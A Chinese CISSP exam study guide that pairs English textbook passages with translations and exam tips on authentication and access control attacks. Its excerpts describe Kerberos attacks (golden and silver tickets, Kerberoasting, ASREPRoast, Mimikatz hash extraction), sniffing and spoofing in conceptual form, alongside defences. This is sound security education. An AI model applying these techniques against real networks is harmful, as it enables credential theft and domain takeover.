本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

NIST:NIST 提供美国常用安全标准、框架和指南。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

哈希本身不提供机密性;它主要用于完整性校验。

身份管理题要区分识别、认证、授权、审计。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
NIST NIST 提供美国常用安全标准、框架和指南。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
身份 身份是主体在系统中的标识。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 47 / PDF P1014

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

systems still create an NTLM hash and store it in memory. An attacker can request a ticket-granting ticket (TGT) with the user's hash and use this TGT to access network resources. This is sometimes called pass the key. Pass the Ticket In a pass the ticket attack, attackers attempt to harvest tickets held in the lsass.exe process. After harvesting the tickets, attackers inject the ticket to impersonate a user. Silver Ticket A silver ticket uses the captured NTLM hash of a service account to create a ticket-granting service (TGS) ticket. Service accounts (user accounts used by services) use TGS tickets instead of TGT tickets.

The silver ticket grants the attacker all the privileges granted to the service account. Golden Ticket If an attacker obtains the hash of the Kerberos service account (KRBTGT), they can create tickets at will within AD. This gives them so much power it is referred to as having a golden ticket. The KRBTGT account encrypts and signs all Kerberos tickets within a domain with a hash of its password. Because the password never changes, the hash never changes, so an attacker needs to learn the hash only once. If an attacker gains access to a domain administrator account, they can then log on to a domain controller remotely and run Mimikatz to extract the hash.

This allows attackers to create forged Kerberos tickets and request ticket-granting service (TGS) tickets for any service. Kerberos Brute Force Attackers can use the Python script kerbrute.py on Linux systems or Rubeus on Windows systems. In addition to guessing passwords, these tools can guess usernames. Kerberos reports whether or not usernames are valid. ASREPRoast ASREPRoast identifies users that don't have Kerberos preauthentication enabled. Kerberos preauthentication is a security feature within Kerberos that helps prevent password-guessing attacks. When preauthentication is disabled, attackers can send an authentication request to a KDC.

The KDC will reply with a TGT, encrypted with the client's password as the key. The attacker can then perform an offline attack to decrypt the ticket and discover the client's password. Kerberoasting Kerberoasting collects encrypted TGS tickets. Service accounts (user accounts used by services) use TGS tickets instead of TGT tickets. After harvesting these tickets, attackers can crack them offline. A TGS ticket is used by services running in the context of a user account. This attack attempts to find users that don't have Kerberos

中文直译 / 整理

系统仍会创建NTLM哈希并将其存储在内存中。 攻击者可以使用用户的哈希请求 票据授予票据(TGT),并使用此TGT访问网络资源。 这有时被称为传递密钥。 传递票据 在传递票据攻击中,攻击者试图从 lsass.exe 进程中窃取票据。 窃取 票据后,攻击者会注入该票据以冒充用户。 银票 银票使用已捕获的服务账户的 NTLM 哈希来创建票据授予服务(TGS)票 据。 服务账户(由服务使用的用户账户)使用 TGS 票据而非 TGT 票据。 银票赋 予攻击者服务账户所拥有的一切权限。 金票 如果攻击者获得了 Kerberos 服务账户(KRBTGT)的哈希,他们就可以 在 Active Directory 中随意创建票据。 这赋予了攻击者极大的权限,因此被称 为拥有 金票。 KRBTGT 账户使用其密码的哈希对域内所有 Kerberos 票据进 行加密和签名。 由于密码永不更改,其哈希也永不改变,因此攻击者只需获取 一次该哈希即可。 如果攻击者获得了域管理员账户的访问权限,他们便可远程 登录域控制器并运行 Mimikatz 来提取该哈希。 这使攻击者能够伪造 Kerberos 票据,并为任何服务请求票据授予服务(TGS)票据。

Kerberos 暴力破解 攻击者可以在 Linux 系统上使用 Python 脚本 kerbrute.py ,或在 Windows 系统上使用 Rubeus。 除了猜测密码外,这些工 具还可以猜测用户名。 Kerberos 会报告用户名是否有效。 ASREPRoast ASREPRoast 用于识别未启用 Kerberos 预身份验证的用户。 Kerberos 预身份验证是 Kerberos 中的一项安全功能,有助于防止密码猜测 攻击。 当预身份验证被禁用时,攻击者可以向 KDC 发送身份验证请求。 K DC 将返回一个 TGT,该 TGT 使用客户端密码作为密钥进行加密。 攻击者随后 可以离线破解该票据以发现客户端密码。 Kerberoasting Kerberoasting 收集加密的 TGS 票据。 服务账户(由服务使用的 用户账户)使用 TGS 票据而非 TGT 票据。 在获取这些票据后,攻击者可以离线破解 它们。 TGS 票据由在用户账户上下文中运行的服务使用。 此攻击试图查找未启用 Kerberos

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

哈希本身不提供机密性;它主要用于完整性校验。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 48 / PDF P1015

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

preauthentication. Sniffer Attack Sniffing captures packets sent over a network with the intent of analyzing the packets. A sniffer (also called a packet analyzer or protocol analyzer) is a software application that captures traffic traveling over the network. Administrators use sniffers to analyze network traffic and troubleshoot problems. Of course, attackers can also use sniffers. A sniffer attack (also called a snooping attack or eavesdropping attack) occurs when an attacker uses a sniffer to capture information transmitted over a network. They can capture and read any data sent over a network in cleartext, including passwords.

Wireshark is a popular protocol analyzer available as a free download. Figure 14.4 shows Wireshark with the contents of a relatively small capture and demonstrates how attackers can capture and read data sent over a network in cleartext. FIGURE 14.4 Wireshark capture The top pane shows packet 260 selected, and you can see the contents of this packet in the bottom pane. It includes the text User: DarrilGibson

中文直译 / 整理

预身份验证的用户。 嗅探攻击 嗅探会捕获通过网络传输的数据包,以分析这些数据包。 嗅探器(也称为数据 包分析器或协议分析器)是一种捕获网络传输流量的软件应用程序。 管理员使 用嗅探器来分析网络流量并排查问题。 当然,攻击者也可以使用嗅探器。 当攻击者使用嗅探器捕获通过网络传输的 信息时,就会发生嗅探攻击(也称为窥探攻击或窃听攻击)。 他们可以捕获 并读取网络上传输的任何明文数据,包括密码。 Wireshark 是一个免费下载的流行协议分析器。 图 14.4展示了 Wireshark 在 捕获相对较小数据包时的内容,并演示了攻击者如何捕获和读取网络上传输的 明文数据。 图 14.4 Wireshark 捕获 顶部窗格显示已选中的第260号数据包,您可以在底部窗格中查看该数据包的内容。 其中包含文本 User: DarrilGibson

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
身份 身份是主体在系统中的标识。
学习单元 49 / PDF P1016

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

Password: IP@$$edCi$$P. If you look at the first packet in the top pane (packet number 250), you can see that the name of the opened file is CISSP Secrets.txt. The following techniques can prevent successful sniffing attacks: Encrypt all sensitive data (including passwords) sent over a network. Attackers cannot easily read encrypted data with a sniffer. For example, Kerberos encrypts tickets to prevent attacks, and attackers cannot easily read the contents of these tickets with a sniffer. Avoid the use of insecure protocols such as HTTP, FTP, and Telnet and use secure protocols such as HTTPS, SFTP, and SSH. Use onetime passwords when encryption is not possible or feasible.

Onetime passwords prevent the success of sniffing attacks because they are only used once. Even if an attacker captures a onetime password, the attacker is not able to use it. Protect network devices with physical security. Controlling physical access to routers and switches prevents attackers from installing sniffers on these devices. Monitor the network for signatures from sniffers. Intrusion detection systems can monitor the network for sniffers and will raise an alert when they detect a sniffer on the network. Spoofing Attacks Spoofing (also known as masquerading or impersonation) is pretending to be something, or someone, else. There is a wide variety of spoofing attacks.

As an example, an attacker can use someone else's credentials to enter a building or access an IT system. Some applications spoof legitimate login screens. One attack brought up a login screen that looked exactly like the operating system logon screen. When the user entered credentials, the fake application captured the user's credentials, and the attacker used them later. Some phishing attacks mimic this with bogus websites. In an IP spoofing attack, the attacker replaces a valid source IP address with a false one to hide their identity or to impersonate a trusted system. Other types of spoofing used in access control attacks include email spoofing and phone number spoofing:

中文直译 / 整理

密码:IP@$$edCi$$P。 如果您查看顶部窗格中的第一个数据包(第250号数据 包),可以看到打开的文件名为 CISSPSecretstxt。 以下技术可以防止成功的嗅探攻击: 加密通过网络发送的所有敏感数据(包括密码)。 攻击者无法轻易使用嗅 探器读取加密数据。 例如,Kerberos 会对票据进行加密以防止攻击,攻 击者也无法轻易使用嗅探器读取这些票据的内容。 避免使用不安全的协议,如 HTTP、FTP 和 Telnet,而应使用安全协议, 如 HTTPS、SFTP 和 SSH。 当无法或难以使用加密时,使用一次性密码。 一次性密码可防止嗅探攻击 成功,因为它们仅使用一次。 即使攻击者捕获了一次性密码,也无法使用 它。 通过物理安全措施保护网络设备。 控制对路由器和交换机的物理访问,可 防止攻击者在这些设备上安装嗅探器。 监控网络中嗅探器的特征。 入侵检测系统可以监控网络中的嗅探器,并在 检测到网络上的嗅探器时发出警报。 欺骗攻击 欺骗(也称为伪装或冒充)是指假装成其他事物或他人。 欺骗攻击有多种类型。 例如,攻击者可以使用他人的凭证进入建筑物或访问IT系统。 一些应用程序会 伪装成合法的登录界面。

其中一种攻击会弹出一个与操作系统登录界面完全相 同的登录屏幕。 当用户输入凭证时,这个伪造的应用程序会捕获用户的凭证, 攻击者随后使用这些凭证。 一些网络钓鱼攻击也通过虚假网站模仿这种手法。 在IP欺骗攻击中,攻击者将有效的源IP地址替换为虚假的IP地址,以隐藏其身 份或冒充受信任的系统。 访问控制攻击中使用的其他欺骗类型包括电子邮件欺 骗和电话号码欺骗:

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

程序:程序是一步一步怎么做。

身份:身份是主体在系统中的标识。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Step-by-step、SOP 常对应 procedure。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
程序 程序是一步一步怎么做。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 50 / PDF P1017

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Email Spoofing Spammers spoof the email address in the From field to make an email appear to come from another source. Phishing attacks often do this to trick users into thinking the email is coming from a trusted source. The Reply To field can be a different email address, and email programs typically don't display this until a user replies to the email. By this time, they often ignore it or don't notice it. Phone Number Spoofing Caller ID services allow users to identify the phone number of any caller. Phone number spoofing allows a caller to replace this number with another one, which is a common technique on Voice over Internet Protocol (VoIP) systems.

One technique attackers have been using recently is to replace the actual calling number with a phone number that includes the same area code as the called number. This makes it look like it's a local call. Core Protection Methods The following list summarizes many security precautions that protect against access control attacks. However, it's important to realize that this isn't a comprehensive list of protections against all types of attacks. You'll find additional controls that help prevent attacks covered throughout this book. Control physical access to systems. An old saying related to security is that if an attacker has unrestricted physical access to a computer, the attacker owns it.

If attackers can gain physical access to an authentication server, they can steal the password file in a very short time. Once they have the password file, they can crack the passwords offline. If attackers successfully download a password file, all passwords should be considered compromised. Control electronic access to files. Tightly control and monitor electronic access to all important data, including files and customer databases containing passwords. End users and those who are not account administrators have no need to access a password database file for daily work tasks. Security professionals should investigate any unauthorized access to password database files immediately.

Hash and salt passwords. Use protocols such as Argon2, bcrypt, and PBKDF2 to salt passwords and consider using an external pepper to further protect passwords. Combined with the use of strong passwords, salted and peppered passwords are extremely difficult to crack using rainbow tables or other methods.

中文直译 / 整理

电子邮件欺骗 垃圾邮件发送者伪造发件人字段中的电子邮件地址,使邮件看起 来来自其他来源。 钓鱼攻击通常会这样做,以诱使用户认为邮件来自可信来源。 回复地址字段可以是不同的电子邮件地址,而电子邮件程序通常不会显示该地址, 直到用户回复邮件为止。 到那时,他们往往忽略它或根本没有注意到。 电话号码伪装来电显示服务允许用户识别任何来电者的电话号码。 电话号码伪装 允许来电者将此号码替换为另一个号码,这是语音互联网协议(VoIP)系统上常 用的技术。 最近,攻击者常用的一种技术是将实际的来电号码替换为与被叫号码 区号相同的电话号码。 这使得来电看起来像是本地呼叫。 核心保护方法 以下列表总结了许多保护措施,用于防范访问控制攻击。 然而,重要的是要认 识到,这并非涵盖所有类型攻击的完整防护清单。 您将在本书的其他部分找到 更多有助于防范相关攻击的控制措施。 控制对系统的物理访问。 与安全相关的一句老话是:如果攻击者对计算机拥有不 受限制的物理访问权限,那么该计算机就属于攻击者。 如果攻击者能够获得对身 份验证服务器的物理访问权限,他们可以在极短时间内窃取密码文件。 一旦他们 获取了密码文件,就可以离线破解密码。

如果攻击者成功下载了密码文件,则所 有密码都应被视为已泄露。 控制对文件的电子访问。 严格控制并监控对所有重要数据(包括包含密码的文件 和客户数据库)的电子访问。 终端用户和非账户管理员在日常工作中无需访问密 码数据库文件。 安全专业人员应立即调查任何对密码数据库文件的未授权访问。 哈希并加盐密码。 使用 Argon2、bcrypt 和 PBKDF2 等协议对密码加盐,并 考虑使用外部 pepper 进一步保护密码。 结合使用强密码,加盐并加 pepper 的密码极难通过彩虹表或其他方法破解。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

哈希本身不提供机密性;它主要用于完整性校验。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
学习单元 51 / PDF P1018

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Use password masking. Ensure that applications don't display passwords in cleartext by default. Instead, mask the display of the password by displaying an alternate character such as an asterisk (*). This reduces shoulder surfing attempts, but users should be aware that an attacker might be able to learn the password by watching the user type the keys on the keyboard. When a system requires users to enter excessively long passwords, developers should consider an option to show the passwords in cleartext. Deploy multifactor authentication (MFA). Deploy multifactor authentication, such as using biometrics or token devices.

When an organization uses MFA, attackers are not able to access a network if they discover just a password. Many online services, such as Google, now offer multifactor authentication as an additional measure of protection. Use account lockout controls. Account lockout controls help prevent online password attacks. They lock an account after the incorrect password is entered a predefined number of times. Account lockout controls typically use clipping levels that ignore some user errors but take action after reaching a threshold. For example, it's common to allow a user to enter the incorrect password as many as five times before locking the account.

For systems and services that don't support account lockout controls, such as most File Transfer Protocol (FTP) servers, extensive logging along with an intrusion detection system (IDS) can protect the server. Account lockout controls help prevent an attacker from guessing a password in an online account. However, this does not prevent an attacker from using a password-cracking tool against a stolen database file containing hashed passwords. Use last logon notification. Many systems display a message including the time, date, and location (such as the computer name or IP address) of the last successful logon.

If users pay attention to this message, they might notice if someone else logged on to their account. For example, if a user logged on to an account last Friday but the last logon notification indicates someone accessed the account on Saturday, it indicates a problem. Users who suspect someone else is logging on to their accounts can change their passwords or report the issue to a system administrator. If it occurs with an organizational

中文直译 / 整理

使用密码掩码。 确保应用程序默认不以明文显示密码。 相反,通过显示替代字符 (如星号 *)来掩码密码显示。 这可以减少窥视攻击,但用户应意识到,攻击者 可能通过观察用户在键盘上输入按键来获取密码。 当系统要求用户输入过长的密 码时,开发者应考虑提供以明文显示密码的选项。 部署多因素身份验证(MFA)。 部署多因素身份验证,例如使用生物识别或 令牌设备。 当组织使用MFA时,攻击者即使仅获取了密码,也无法访问网络。 许多在线服务(如Google)现在都将多因素身份验证作为额外的保护措施。 使用账户锁定控制。 账户锁定控制有助于防止在线密码攻击。 当用户连续输入 错误密码达到预设次数时,系统将锁定该账户。 账户锁定控制通常采用截断级 别,忽略部分用户误操作,但在达到阈值后采取行动。 例如,通常允许用户最 多输入五次错误密码后再锁定账户。 对于不支持账户锁定控制的系统和服务 (如大多数文件传输协议(FTP)服务器),可通过详尽的日志记录和入侵检 测系统(IDS)来保护服务器。 账户锁定控制有助于防止攻击者在线猜测密码。 然而,这并不能阻止 攻击者使用密码破解工具针对被盗的包含哈希密码的数据库文件。 使用上次登录通知。

许多系统会显示一条消息,其中包含上次成功登录的时间、 日期和位置(例如计算机名称或IP地址)。 如果用户关注此消息,他们可能会发 现是否有其他人登录了他们的账户。 例如,如果用户上周五登录了账户,但上次 登录通知显示有人在周六访问了该账户,则表明存在问题。 怀疑他人登录其账户 的用户可以更改密码或向系统管理员报告该问题。 如果发生在组织

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

哈希本身不提供机密性;它主要用于完整性校验。

检测是 IDS,主动阻断更像 IPS。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
身份 身份是主体在系统中的标识。
多因素认证 MFA 使用至少两类不同认证因素,提高认证可信度。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 52 / PDF P1019

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

account, users should report it following the organization's security incident reporting procedures. Educate users about security. Properly trained users have a better understanding of security and the benefit of using stronger passwords. Inform users that they should never share or write down their passwords. Administrators might write down long, complex passwords for the most sensitive accounts, such as administrator or root accounts, and store these passwords in a vault or safety deposit box. Offer tips to users on how to create strong passwords, such as with password phrases, and how to prevent shoulder surfing.

Also, let users know the dangers of using the same password for all online accounts, such as banking accounts and gaming accounts. When a user uses the same passwords for all these accounts, a successful attack on a gaming system can give attackers access to the user's bank accounts. Users should also know about common social engineering tactics. Summary This chapter covered several different access control models. With a discretionary access control (DAC) model, all objects have an owner, and the owner has full control over the object. Role-based access control (RBAC) models use roles or groups that often match the hierarchy of an organization.

Administrators place users into roles and assign privileges to the roles based on jobs or tasks. Rule-based access controls use global rules that apply to all subjects equally. Attribute-based access control (ABAC) models use policies that include attributes to assign access. Mandatory access control (MAC) models require all objects to have labels, and access is based on subjects having a matching label. Risk-based access controls evaluate the environment and the situation and make risk-based decisions based on security policies. The emerging zero-trust model presumes no inherent trust and continuously verifies each request against dynamic policies.

Several internet-based authentication systems provide users with single signon (SSO) capabilities. SAML is an XML-based standard used to exchange authentication and authorization information. OAuth 2.0 is an authorization framework. OIDC uses OAuth 2.0, and it builds on the technologies used by OpenID. It uses a JSON Web Token as an ID token. Kerberos is a popular SSO authentication protocol using tickets for authentication in internal networks. It uses a database of subjects, symmetric

中文直译 / 整理

账户中,用户应按照组织的安全事件报告程序进行报告。 向用户普及安全知识。 经过适当培训的用户对安全性和使用更强密码的好处有 更深入的理解。 告知用户绝不可分享或记录他们的密码。 管理员可能会为最敏 感的账户(如管理员或root账户)记录长而复杂的密码,并将这些密码存储在 保险库或安全存款箱中。 向用户提供创建强密码的建议,例如使用密码短语, 以及如何防止窥视。 同时,让用户了解在所有在线账户(如银行账户和游戏账 户)中使用相同密码的危险性。 当用户在所有这些账户中使用相同的密码时, 对游戏系统的成功攻击可能使攻击者获得用户银行账户的访问权限。 用户还应 了解常见的社会工程学手段。 摘要 本章介绍了多种不同的访问控制模型。 在自主访问控制(DAC)模型中,所有 对象都有所有者,所有者对该对象拥有完全控制权。 基于角色的访问控制( RBAC)模型使用角色或组,这些角色或组通常与组织的层级结构相匹配。 管 理员将用户分配到角色,并根据工作或任务为角色分配权限。 基于规则的访问 控制使用适用于所有主体的全局规则。 基于属性的访问控制(ABAC)模型使 用包含属性的策略来分配访问权限。

强制访问控制(MAC)模型要求所有对象 都带有标签,访问权限基于主体是否具有匹配的标签。 基于风险的访问控制评 估环境和情境,并根据安全策略做出基于风险的决策。 新兴的零信任模型假设 不存在固有信任,并持续针对动态策略验证每个请求。 多个基于互联网的认证系统为用户提供单点登录(SSO)功能。 SAML 是一种 用于交换认证和授权信息的基于 XML 的标准。 OAuth 2.0 是一种授权框架。 OIDC 使用 OAuth 2.0,并在其基础上构建了 OpenID 所使用的技术。 它使用 JSON Web Token 作为 ID 令牌。 Kerberos 是一种流行的单点登录身份验证协议,使用票据在内部网络中进行身份 验证。 它使用主体数据库、对称

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

标准:标准给出必须满足的最低要求。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
学习单元 53 / PDF P1020

DAD、过度保护、真实性、不可否认性与 AAA

CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

教材原文段落

cryptography, and time synchronization of systems to issue tickets. RADIUS and TACACS+ are common authentication, authorization, and accounting (AAA) protocols. Access control attacks include privilege escalation techniques to gain more rights and permissions. Passwords are a common authentication mechanism, and several types of attacks attempt to crack passwords. Password attacks include dictionary attacks, brute-force attacks, spraying attacks, credential stuffing attacks, birthday attacks, rainbow table attacks, pass-the-hash attacks, Kerberos exploitation attacks, and sniffer attacks. Study Essentials Identify common authorization mechanisms.

Authorization ensures that the requested activity or object access is possible, given the authenticated identity's privileges. For example, it ensures that users with appropriate privileges can access files and other resources. Common authorization mechanisms include implicit deny, access control lists, access control matrices, capability lists, constrained interfaces, content-dependent controls, and context-dependent controls. These mechanisms enforce security principles such as need to know, the principle of least privilege, and separation of duties. Describe key concepts of the discretionary access control (DAC) model.

